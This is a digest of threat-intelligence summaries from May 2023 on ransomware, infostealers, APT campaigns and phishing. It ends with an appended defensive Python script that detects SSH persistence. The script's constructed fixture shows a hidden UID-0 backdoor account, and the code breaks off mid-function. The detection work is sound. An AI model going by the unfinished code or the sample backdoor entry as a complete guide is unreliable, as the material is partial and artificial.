- Impact:
- LOW
- Summary:
- ReversingLabs researchers found two malicious packages that contained TurkoRat, an open source infostealer that lurked on npm for two months before being detected.
Source:
https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
—
- Intel Source:
- Cofense
- Intel Name:
- The_attackers_used_email_security_providers_for_spreading_phishing_attacks
- Date of Scan:
- 2023-05-18
- Impact:
- LOW
- Summary:
- Threat actors more often send malicious URLs within HTML attachments, which makes it more challenging for Secure Email Gateways (SEGs) to block them. The Phishing Defence Centre analysed a phishing campaign impersonating an email security provider to trick recipients into providing their user credentials via a malicious HTML attachment.
—
- Intel Source:
- Cyble
- Intel Name:
- BlackSuit_Ransomware_targets_VMware_ESXi_servers
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Cyble researchers observed an increase in the number of ransomware groups, such as Cylance and Royal ransomware. The widespread use of Linux makes it an appealing target for ransomware groups, as a single attack can potentially compromise numerous systems.
Source:
https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/
—
- Intel Source:
- Wordfence
- Intel Name:
- The_exploitation_of_critical_vulnerability_CVE_2023_32243
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Recently, Essential Addons for Elementor, a WordPress plugin, released a patch for a critical vulnerability that allows any unauthenticated user to reset arbitrary user passwords, including those of accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_analysis_of_QakBot_Infrastructure
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- Team Cymru shared their analysis of QakBot, in which various hypotheses were identified and tested. Their key findings are that QakBot C2 servers are not separated by affiliate ID, that QakBot C2 servers from older configurations continue to communicate with upstream C2 servers months after being used in campaigns, and the identification of three upstream C2 servers located in Russia, two of which behave similarly based on network telemetry patterns and the geolocations of the bot C2s communicating with them.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure
—
- Intel Source:
- ASEC
- Intel Name:
- The_Korean_VPN_installer_is_being_used_to_distribute_SparkRAT
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center (ASEC) has recently discovered SparkRAT being distributed within the installer of a certain VPN program. SparkRAT is a Remote Administration Tool (RAT) developed with GoLang. When installed on a user’s system, it can perform a variety of malicious behaviors, such as executing commands remotely, controlling files and processes, downloading additional payloads, and collecting information from the infected system, such as by taking screenshots.
—
- Intel Source:
- CISA
- Intel Name:
- Joint_Cybersecurity_Advisory_on_BianLian_Ransomware_Group
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- The FBI, CISA and Australian Cyber Security Centre (ACSC) released the joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations back in March 2023. BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Python_Packages_via_Supply_Chain_Attacks
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The FortiGuard Labs team discovered over 30 new zero-day attacks in PyPI packages (Python Package Index). These were found between late March and late April by monitoring an open-source ecosystem.
—
- Intel Source:
- Symantec
- Intel Name:
- The_Lancefly_APT_group_using_Merdoor_backdoor
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The Lancefly APT group is attacking and targeting organizations in South and Southeast Asia with a custom-written backdoor. Lancefly’s custom malware, named Merdoor, is a powerful backdoor that has existed since 2018. The recent targets are based in South and Southeast Asia, in sectors including government, aviation, education, and telecoms. Symantec researchers observed that the activity also appeared to be highly targeted, with only a small number of machines infected.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Uncovering_RedStinger_new
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- Since the conflict between Russia and Ukraine began last year, the confrontation has not only been political; it is no surprise that the cybersecurity landscape between these two countries has also been tense. A former researcher from the Malwarebytes Threat Intelligence Team discovered a new interesting lure that targeted the Eastern Ukraine region, reported that finding to the public, and tracked this actor as Red Stinger. These findings remained private for a while, but Kaspersky recently shared information about the same actor (which it called Bad Magic).
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_8220_Gang_Strategies
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- Researchers documented the recent activities of the 8220 Gang, which has been active in recent months. In their article, the researchers shared an observed attack exploiting the Oracle WebLogic vulnerability CVE-2017-3506, captured by one of their honeypots. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when exploited can enable attackers to execute arbitrary commands remotely through an HTTP request with a specifically crafted XML document.
Source:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Water_Orthrus_s_New_Campaigns
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have been monitoring the activities of a threat actor named Water Orthrus, which spread CopperStealer malware via pay-per-install (PPI) networks. In March 2023, they observed two campaigns delivering new malware that they named CopperStealth and CopperPhish. Both malware families have characteristics close to those of CopperStealer and are likely developed by the same author, leading the researchers to believe that these campaigns are likely Water Orthrus’ new activities.
—
- Intel Source:
- Securonix
- Intel Name:
- Ongoing_Phishing_Campaign_uses_Meme_Filled_Code_to_Drop_XWorm_Payloads
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Over the last couple of months, the Securonix Threat Research team identified and tracked an interesting, ongoing attack campaign. The campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload, to infect its victims. Securonix dived into this campaign with an in-depth technical analysis.
Source:
https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ransomware_variant_Rancoz
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- This month Cyble researchers observed a ransomware variant called Rancoz, which was identified by the researcher @siri_urz. During the investigation, it was observed that this ransomware is similar to and overlaps with the Vice Society ransomware.
Source:
https://blog.cyble.com/2023/05/11/dissecting-rancoz-ransomware/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Eastern_European_APT_Cyber_Operations_Undetected_Since_2020
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered a new interesting lure that targeted the Eastern Ukraine region and reported that finding to the public. Moreover, they started tracking the actor behind it, which they internally codenamed Red Stinger.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- ASEC
- Intel Name:
- LokiLocker_Ransomware_Distributed_in_Korea
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of the LokiLocker ransomware in Korea. This ransomware is almost identical to the BlackBit ransomware and their common traits
—
- Intel Source:
- Malware Bytes
- Intel Name:
- The_Aurora_stealer_via_Invalid_Printer_loader
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malware Bytes Lab shared their discovery about this malicious campaign and its connections to other attacks. They discovered that a threat actor was using malicious ads to redirect users to what looks like a Windows security update. The scheme looked very legitimate and very much resembled what you’d expect from Microsoft. That fake security update was using a newly identified loader that, at the time of the campaign, was invisible to malware sandboxes and bypassed practically all antivirus engines. Malware Bytes Lab patched that loader and identified its actual payload as Aurora stealer.
—
- Intel Source:
- Fortinet
- Intel Name:
- Maori_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs recently came across a new ransomware variant called Maori. Like other ransomware variants, it encrypts files on victims’ machines to extort money. Interestingly, this variant is designed to run on Linux architecture and is coded in Go, which is somewhat rare and increases the analysis difficulty.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-maori?&web_view=true
—
- Intel Source:
- Cyble
- Intel Name:
- An_In_Depth_Look_at_Akira_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have come across a Reddit post about a new ransomware variant named “Akira”, actively targeting numerous organizations and exposing their sensitive data. To increase the chances of payment from victims, Akira ransomware exfiltrates and encrypts their data using a double-extortion technique. The attackers then threaten to sell or leak the stolen data on the dark web if the ransom is not paid for decrypting the data.
Source:
https://blog.cyble.com/2023/05/10/unraveling-akira-ransomware/
—
- Intel Source:
- Deep Instinct Blog
- Intel Name:
- A_new_undetected_variant_of_Linux_Backdoor_BPFDoor
- Date of Scan:
- 2023-05-15
- Impact:
- MEDIUM
- Summary:
- BPFdoor is a Linux-specific, low-profile, passive backdoor intended to maintain a persistent, long-term foothold in already-breached networks and environments and functions primarily to ensure an attacker can re-enter an infected system over an extended period of time, post-compromise.
Source:
https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_CVE_2023_27350
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
—
- Intel Source:
- Mcafee
- Intel Name:
- Analysis_of_a_evasive_Shellcode
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- McAfee researchers have observed NSIS-based installers delivered via e-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Statistics_May_1_7th_2023
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15th, 2023 and provides statistical information on each type.
—
- Intel Source:
- Dragos
- Intel Name:
- A_cybercriminal_group_attempted_an_extortion_scheme_against_Dragos
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- Last week, a known hacker group attempted and failed an extortion scheme against Dragos. Nothing was breached at Dragos, including anything related to the Dragos Platform. Dragos has shared what happened during this recent failed extortion attempt against the company. The cybercriminal group attempted to compromise Dragos’ information resources. The criminal group got access by compromising the personal email address of a new sales employee prior to their start date, and subsequently used their personal information to impersonate the Dragos employee and accomplish initial steps in the employee onboarding process.
Source:
https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Threat_Actors_Build_ESXi_Lockers_Using_Leaked_Babuk_Code
- Date of Scan:
- 2023-05-13
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil.
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Expansion_of_RapperBot_DDoS_Botnet_into_Cryptojacking
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- FortiGuard researchers have analyzed new samples of the RapperBot campaign active since January 2023. The threat actors have started venturing into cryptojacking, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot.
Source:
https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking
—
- Intel Source:
- Bitdefender
- Intel Name:
- DownEx_Espionage_activity_in_Central_Asia
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
- Last year Bitdefender Labs researchers observed an attack on foreign government institutions in Kazakhstan. During the analysis, it was discovered that this was a highly targeted attack aimed at gaining access to exfiltrate data. Bitdefender Labs researchers monitored it and the region for a while for other similar attacks. Recently they detected another attack in Afghanistan and collected additional samples and observations.
—
- Intel Source:
- ASEC
- Intel Name:
- CLR_SqlShell_malware_Attack_MS_SQL_Servers
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
- ASEC analyzed the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior.
—
- Intel Source:
- Mcafee
- Intel Name:
- The_Examination_of_Highly_Evasive_Shellcode_Based_Loader
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- McAfee researchers have deeply analyzed the GULoader campaigns and found a rise in NSIS-based installers delivered via e-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system.
—
- Intel Source:
- Cert-PL
- Intel Name:
- Malspam_Campaign_Delivering_PowerDash
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- CERT-PL researchers have observed a malspam campaign delivering previously unseen PowerShell malware. They dubbed this malware family “PowerDash” because of the “/dash” path on the C2 server, which is used as a gateway for bots.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Royal_Ransomware_Expands_to_Target_Linux_and_VMware_ESXi
- Date of Scan:
- 2023-05-10
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have observed that the Royal ransomware group has recently launched a variant of its encryptor malware built in the form of an executable and linkable format (ELF) binary. They have also started using the BatLoader dropper and SEO poisoning for initial access.
Source:
https://unit42.paloaltonetworks.com/royal-ransomware/
—
- Intel Source:
- Abnormal
- Intel Name:
- Taking_a_Closer_Look_at_Israel_Based_BEC_Attacks
- Date of Scan:
- 2023-05-10
- Impact:
- HIGH
- Summary:
- Researchers from Abnormal Security have discovered that an Israel-based threat group has conducted 350 BEC campaigns since February 2021, with email attacks targeting employees from 61 countries across six continents.
—
- Intel Source:
- Cofense
- Intel Name:
- MitM_Phishing_Growing_and_Using_Real_Login_Process_to_Steal_Credentials
- Date of Scan:
- 2023-05-10
- Impact:
- LOW
- Summary:
- Cofense researchers have observed that man-in-the-middle (MitM) attacks are increasing rapidly: they identified a 35% increase in volume reaching inboxes between Q1 2022 and Q1 2023, 94% of MitM credential phishing attacks reaching inboxes targeted O365 authentication, and 89% of campaigns used at least one URL redirect, with 55% using two or more.
Source:
https://cofense.com/blog/cofense-intelligence-strategic-analysis-2/
—
- Intel Source:
- Fortinet
- Intel Name:
- AndoryuBot_Targeting_Ruckus_Wireless_Admin_Remote_Code_Execution_Vulnerability
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- FortiGuard researchers have observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies.
—
- Intel Source:
- Blackberry
- Intel Name:
- SideWinder_Using_Server_Based_Polymorphism_Technique
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- BlackBerry researchers have observed that APT Group SideWinder is accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.
Source:
https://blogs.blackberry.com/en/2023/05/sidewinder-uses-server-side-polymorphism-to-target-pakistan
—
- Intel Source:
- Quickheal
- Intel Name:
- IRCTC_fake_apps
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Quickheal analysts went through the recent advisory published by the Indian Railway Catering and Tourism Corporation (IRCTC) about the fake IRCTC apps. The fake IRCTC app pretends to be the real IRCTC app but is in reality a full-fledged spyware that spies on victims with ease.
Source:
https://blogs.quickheal.com/beware-fake-applications-are-disguised-as-legitimate-ones/
—
- Intel Source:
- Cofense
- Intel Name:
- Microsoft_Phish_Redirects_Victims_to_Catering_Voice_Recording
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed credential phishing campaigns that use a novel deception technique, luring unsuspecting users into a false sense of security after they’ve given away their Microsoft login information.
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Stealer_Distributed_by_YouTube_Accounts
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of RecordBreaker through a YouTube account that is assumed to have been recently hacked. RecordBreaker is a new Infostealer version of Raccoon Stealer. It disguises itself as a software installer, similar to CryptBot, RedLine, and Vidar.
—
- Intel Source:
- Mcafee
- Intel Name:
- New_MultiStage_Attack_and_Malware_Distribution_of_Amadey
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- McAfee Labs researchers have identified an increase in Wextract.exe samples that drop a malware payload in multiple stages.
—
- Intel Source:
- Cleafy
- Intel Name:
- New_Web_Injection_Toolkit_DrIBAN_Targeting_Italian_Corporate_Banking_Clients
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have observed that Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter1
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_and_RoarBAT_Malware_Attacks_Against_Ukraine
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified an ongoing phishing campaign with invoice-themed lures being used to distribute the SmokeLoader malware in the form of a polyglot file.
—
- Intel Source:
- Fortinet
- Intel Name:
- SideCopy_Group_Delivering_Malware_via_Phishing_Emails
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- FortiGuard researchers have identified one file that referenced an Indian state military research organization and an in-development nuclear missile. The file is meant to deploy malware with characteristics matching the APT group SideCopy. With activities dating back to at least 2019, this group has aligned its targeting with the goals and objectives of the Pakistani government.
Source:
https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy
—
- Intel Source:
- Cyble
- Intel Name:
- Phishing_Sites_Spreading_RAT_Called_DarkWatchMan
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a phishing website that imitated a renowned Russian website, CryptoPro CSP. TAs are using this website to distribute DarkWatchman malware.
Source:
https://blog.cyble.com/2023/05/05/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- US_Job_Services_Leaks_Customer_Data
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified a huge tranche of full credit card records exposed online, and that at first glance the domain names involved appeared to be affiliated with the United States Postal Service.
—
- Intel Source:
- Mcafee
- Intel Name:
- An_Increase_in_SHTML_Phishing_Attacks
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- McAfee researchers have observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or displaying phishing forms locally within the browser to harvest user-sensitive information.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/
—
- Intel Source:
- Netscope
- Intel Name:
- The_Analysis_of_CrossLock_Ransomware
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Netskope researchers have identified a new ransomware named CrossLock. It emerged in April 2023, targeting a large digital certifier company in Brazil. This ransomware was written in Go, which has also been adopted by other ransomware groups, including Hive, due to the cross-platform capabilities offered by the language.
Source:
https://www.netskope.com/blog/netskope-threat-coverage-crosslock-ransomware
—
- Intel Source:
- Cyble
- Intel Name:
- New_KEKW_Malware_Variant_Detected_in_PyPI_Packages
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered multiple malicious Python .whl (Wheel) files that are found to be distributing a new malware named ‘KEKW’. KEKW malware can steal sensitive information from infected systems, as well as perform clipper activities which can lead to the hijacking of cryptocurrency transactions.
Source:
https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
—
- Intel Source:
- Sophos
- Intel Name:
- DLL_sideloading_Attacks_Gain_New_Air_With_a_Doubled_Dragon_Breath
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Sophos researchers have spotted malicious DLL sideloading activity that builds on the classic sideloading scenario but adds complexity and layers to its execution.
Source:
https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
—
- Intel Source:
- Meta
- Intel Name:
- Multiple_Malware_Targeting_Business_Users
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Researchers from Meta have analyzed the persistent malware campaigns targeting businesses across the internet, including threat indicators to help raise the industry’s collective defenses across the internet.
Source:
https://engineering.fb.com/2023/05/03/security/malware-nodestealer-ducktail/
—
- Intel Source:
- Lab52
- Intel Name:
- Mustang_Panda_New_Campaign_Against_Australia
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Lab52 researchers have found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.
Source:
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_Second_Variant_of_Atomic_Stealer_macOS_Malware
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- SentinelOne researchers report that the threat actor behind Atomic Stealer has been looking for other ways to target macOS users with a different version of the malware. Their post takes a closer look at how Atomic Stealer works, describes a previously unreported second variant, and provides a comprehensive list of indicators to aid threat hunters and security teams defending macOS endpoints.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Kimsuky_New_Global_Campaign
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe. Ongoing campaigns use a new malware component called ReconShark, which is delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros. ReconShark operates as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a broader set of activity attributed to North Korea.
Source:
https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Infostealer_Embedded_in_a_Word_Document
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious Word document that delivers an infostealer through an embedded object.
Source:
https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Raspberry_Robin_USB_malware_campaign
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- The Bushidotoken blog shares technical details about Raspberry Robin: how it runs, the commands it executes, the processes it uses, and what its C2 communications look like.
Source:
https://blog.bushidotoken.net/2023/05/raspberry-robin-global-usb-malware.html
—
- Intel Source:
- Cyble
- Intel Name:
- BlackBit_Ransomware
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have analyzed the BlackBit ransomware, which is being distributed in Korea. BlackBit is a LokiLocker ransomware variant based on the RaaS model. Its source code shows that the ransomware is a copy of LokiLocker with some changes such as icons, name, and color scheme. BlackBit is a sophisticated ransomware with several capabilities to establish persistence, evade defenses, and impair recovery.
Source:
https://blog.cyble.com/2023/05/03/blackbit-ransomware-a-threat-from-the-shadows-of-lokilocker/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malware_IcedID_information_stealer_configuration_analyses
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- Palo Alto researchers shared an example of an IcedID (information stealer) malware configuration, explaining how it was obfuscated and how they extracted it, using a single IcedID binary to show how its configuration is encrypted.
Source:
https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Vidar_Infostealer_targeted_a_Polish_Healthcare_Industry
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have observed a spear-phishing email targeting the healthcare industry in Poland. The spoofed email appeared to come from a Polish government entity and carried a malicious Microsoft Excel XLL attachment that can download and execute the Vidar infostealer.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Destructive_cyberattack_UAC_0165_on_the_public_sector_of_Ukraine_using_RoarBat
- Date of Scan:
- 2023-05-05
- Impact:
- MEDIUM
- Summary:
- Upon receiving information about interference in the information and communication system (ICS) of one of the state organizations of Ukraine, CERT-UA initiated an investigation of the cyber attack. It found that the operation of computing equipment (servers, automated user workstations, data storage systems) was impaired as a result of destructive activity carried out using the RoarBat malware.
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Investigation_of_BRAINSTORM_and_RILIDE
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified BRAINSTORM, a Rust-based dropper that ultimately leads to RILIDE, a Chromium-based extension first publicly reported by SpiderLabs. Further investigation showed that the email and cryptocurrency theft ecosystem around RILIDE is larger than previously reported.
Source:
https://www.mandiant.com/resources/blog/lnk-between-browsers
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Longzhi_is_Back_With_New_Technique
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new campaign by Earth Longzhi that is targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji. The campaign, which follows months of dormancy, abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard64.sys, to disable security products installed on the hosts via a bring-your-own-vulnerable-driver (BYOVD) attack.
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_Korean_Group_ScarCruft_Deploying_RokRAT_Malware
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Check Point researchers have identified that the North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.
Source:
https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/
—
- Intel Source:
- SocRadar
- Intel Name:
- Diving_Deep_into_BlackByte_Ransomware
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Researchers from SOCRadar have analyzed the BlackByte ransomware. It is a ransomware operation that began targeting corporate victims worldwide in July 2021. The first findings regarding the group emerged after victims sought help decrypting their files.
Source:
https://socradar.io/dark-web-profile-blackbyte-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiner_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have followed a distinct pattern since 2022: they involve malware built with Shell Script Compiler to install XMRig, as well as the creation of a backdoor SSH account.
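Because the ASEC entry above hinges on a backdoor SSH account, here is an added example (not ASEC's code) of the host-side check a responder would run on a suspected server: parse /etc/passwd for extra UID-0 or unexpected login-capable accounts, and fingerprint every authorized_keys entry so that keys outside the issued inventory stand out. The passwd and authorized_keys contents, the baseline account list and the key blobs are all constructed.

```python
"""Spot SSH persistence on a Linux host: extra UID-0 or login-capable accounts in
/etc/passwd, and authorized_keys entries whose fingerprint is not in a known inventory.

Added example, not ASEC's code. The passwd and authorized_keys contents below are
constructed; the key blobs are arbitrary base64, not real public keys.
"""
import base64
import hashlib

# Accounts that may legitimately have a login shell on this host (assumed baseline).
LOGIN_BASELINE = {"root", "deploy"}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
deploy:x:1000:1000:deploy:/home/deploy:/bin/bash
sysadm:x:0:0::/var/tmp/.x:/bin/bash
upd:x:1001:1001::/home/upd:/bin/sh
"""

SAMPLE_AUTHORIZED_KEYS = """\
# /root/.ssh/authorized_keys (constructed)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA0123456789abcdefghijklmnopqrstuvwxyzABCDEF backup@mgmt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZxyz ops@localhost
"""


def parse_passwd(text):
    """Yield one dict per /etc/passwd record."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        yield {"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell}


def suspicious_accounts(passwd_text, login_baseline=LOGIN_BASELINE):
    """(account, reason) for UID-0 aliases of root and for unexpected login-capable accounts."""
    findings = []
    for acct in parse_passwd(passwd_text):
        if acct["uid"] == 0 and acct["name"] != "root":
            findings.append((acct["name"], "uid 0 but not root; home %s" % acct["home"]))
        elif acct["shell"] not in NOLOGIN_SHELLS and acct["name"] not in login_baseline:
            findings.append((acct["name"], "login shell %s not in baseline" % acct["shell"]))
    return findings


def key_fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob, as ssh-keygen -lf prints it."""
    raw = base64.b64decode(blob_b64 + "=" * (-len(blob_b64) % 4))
    digest = hashlib.sha256(raw).digest()
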